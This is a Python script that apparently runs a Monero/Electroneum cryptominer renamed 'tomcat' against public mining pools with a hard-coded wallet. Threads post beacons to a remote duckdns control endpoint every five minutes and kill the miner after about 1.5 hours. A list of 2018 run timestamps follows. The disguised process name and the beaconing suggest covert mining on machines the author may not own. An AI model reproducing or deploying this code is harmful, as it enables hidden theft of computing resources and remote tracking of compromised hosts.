import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:11:05.966943
#2018-02-17 15:57:06.144331
#2018-02-17 17:46:05.199285
#2018-02-17 19:35:01.764507
#2018-02-17 21:23:05.711474
#2018-02-17 23:07:03.675675
#2018-02-18 00:54:06.243574
#2018-02-18 02:42:05.504002
#2018-02-18 04:31:01.520837
#2018-02-18 06:22:02.175314
#2018-02-18 08:10:08.618786
#2018-02-18 09:59:06.664121
#2018-02-18 11:47:03.734170
#2018-02-18 13:32:05.010324
#2018-02-18 15:22:05.688799
#2018-02-18 17:11:05.193451
#2018-02-18 18:59:04.469872
#2018-02-18 20:46:02.019065
#2018-02-18 22:32:06.864832
#2018-02-19 00:20:01.446584
#2018-02-19 02:06:03.636964
#2018-02-19 03:52:03.908440
#2018-02-19 05:37:03.916326
#2018-02-19 07:24:06.461229
#2018-02-19 09:13:04.509360
#2018-02-19 11:04:03.204603
#2018-02-19 12:51:04.625762
#2018-02-19 14:39:01.593792
#2018-02-19 16:28:06.117163
#2018-02-19 18:16:08.571870
#2018-02-19 20:02:06.314858
#2018-02-19 21:50:06.872183
#2018-02-19 23:38:05.380450
#2018-02-20 01:24:01.896376
#2018-02-20 03:14:05.540605
#2018-02-20 05:01:03.699796
#2018-02-20 06:43:05.294131
#2018-02-20 08:29:04.715735
#2018-02-20 10:14:01.881397
#2018-02-20 11:58:05.906316
#2018-02-20 13:46:10.317570
#2018-02-20 15:28:08.118481
#2018-02-20 17:13:12.454898
#2018-02-20 19:03:08.141227
#2018-02-20 20:53:05.759143
#2018-02-20 22:37:07.120679
#2018-02-21 00:19:05.858809
#2018-02-21 02:06:05.268741
#2018-02-21 03:55:05.395749
#2018-02-21 05:42:05.514371
#2018-02-21 07:30:08.089962
#2018-02-21 09:15:10.376321
#2018-02-21 11:04:05.975923
#2018-02-21 12:50:10.005899
#2018-02-21 14:39:07.821560
#2018-02-21 16:26:07.459731
#2018-02-21 18:18:05.331038
#2018-02-21 20:03:08.307418
#2018-02-21 21:50:05.591345
#2018-02-21 23:36:03.751239
#2018-02-22 01:24:06.552631
#2018-02-22 03:14:06.827911
#2018-02-22 05:01:04.096921
#2018-02-22 06:44:01.596431
#2018-02-22 08:32:07.515882
#2018-02-22 10:18:04.506789
#2018-02-22 12:03:11.288316
#2018-02-22 13:48:07.569215
#2018-02-22 15:36:07.517778
#2018-02-22 17:23:07.362847
#2018-02-22 19:12:10.243239
#2018-02-22 21:04:08.973350
#2018-02-22 22:49:01.259879
#2018-02-23 00:36:08.492903
#2018-02-23 02:21:05.822498
#2018-02-23 04:09:05.275386
#2018-02-23 05:56:05.206381
#2018-02-23 07:44:07.501756
#2018-02-23 09:51:05.811711
#2018-02-23 11:56:04.863319
#2018-02-23 13:46:05.542874
#2018-02-23 15:34:01.815654
#2018-02-23 17:22:05.673490
#2018-02-23 19:08:04.775447
#2018-02-23 20:53:04.416687
#2018-02-23 22:39:05.430855
#2018-02-24 00:26:01.848058
#2018-02-24 02:17:04.143119
#2018-02-24 04:06:04.749626
#2018-02-24 05:53:07.941861
#2018-02-24 07:43:06.794769
#2018-02-24 09:28:03.693108
#2018-02-24 11:21:01.490193
#2018-02-24 13:10:01.672621
#2018-02-24 15:00:04.241093
#2018-02-24 16:49:06.999246
#2018-02-24 18:37:07.241937
#2018-02-24 20:28:02.446206
#2018-02-25 01:21:06.700616
#2018-02-25 05:29:01.911810
#2018-02-25 11:35:01.773584